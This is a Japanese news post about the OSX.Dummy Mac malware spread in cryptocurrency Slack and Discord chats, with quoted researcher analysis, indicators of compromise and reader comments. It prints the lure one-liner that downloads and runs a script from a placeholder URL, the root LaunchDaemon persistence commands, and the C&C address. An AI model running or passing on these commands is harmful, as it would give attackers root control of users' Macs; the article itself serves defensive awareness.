Macをターゲットとした新しいマルウェア「OSX.Dummy」が仮想通貨コミュニティ内で流行しているそうです。詳細は以下から。
米SANSのRemco VerhoefさんやObjective-SeeのPatrick Wardleさんらによると、現在SlackやDiscordの仮想通貨コミュニティチャット内で、ユーザーのMacに侵入し任意のコマンドを実行したり、個人情報を盗み出すマルウェア「OSX.Dummy」をダウンロードするスニペットが共有&流行しているそうです。
Previous days we’ve seen multiple MacOS malware attacks, originating within crypto related Slack or Discord chats groups by impersonating admins or key people. Small snippets are being shared, resulting in downloading and executing a malicious binary.
InfoSec Handlers Diary Blog – Crypto community target of MacOS malware
Patrickさんによると、このOSX.Dummyマルウェアは以下のように署名されておらず、通常署名がない実行ファイルはmacOSのセキュリティ機能「Gatekeeper」によってブロックされますが、このマルウェアはユーザーがターミナルコマンドを通してダウンロード&実行するためGatekeeperに捕まらず実行され、
cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
ユーザーが管理者パスワードを要求後、パスワードが入力されるとダウンロードしたスクリプトを”/var/root”へ移動し、LaunchDaemonsやplistを作成、デーモンを起動、攻撃者のC&Cサーバーと接続を開始し接続が成功すれば、悪意のある攻撃者がRoot権限で任意のスクリプトを実行できるようになるそうです。
- moving the script into /var/root
mv "/tmp/script.sh" "/var/root/"
mv "/tmp/com.startup.plist" "/Library/LaunchDaemons/
chown root "/Library/LaunchDaemons/com.startup.plist"
launchctl load "-w" "/Library/LaunchDaemons/com.startup.plist"
If the connection to the attacker’s C&C server (185.243.115.230:1337) succeeds, the attacker will be able to arbitrarily execute commands (as root!) on the infected system.
OSX.Dummy – Objective-See
OSX.Dummyの検出
OSX.Dummyは2018年06月29日時点で検出できるウィルス対策エンジンは0だったそうですが、現在ではESETやSymantec, Kaspersky, Sophos, Trend Microなど9つのセキュリティアプリが検出に対応しており、実行ファイルやC&Cサーバーも明らかになってきたので、気になる方は以下の情報をチェックしてみてください。
Indicators of Compromise
- /var/root/script.sh
- /Users/Shared/dumpdummy
- /Library/LaunchDaemons/com.startup.plist
- /tmp/script.sh
- /tmp/com.startup.plist
- /tmp/dumpdummy
- OSX.Dummy – Objective-See
- Crypto community target of MacOS malware – InfoSec Handlers Diary Blog
コメント
ほんとMacのアンチウイルスソフトはいらねえと思うわ。
どっかのギーク向け記事でも読んでから定義ファイル作ってんだろ。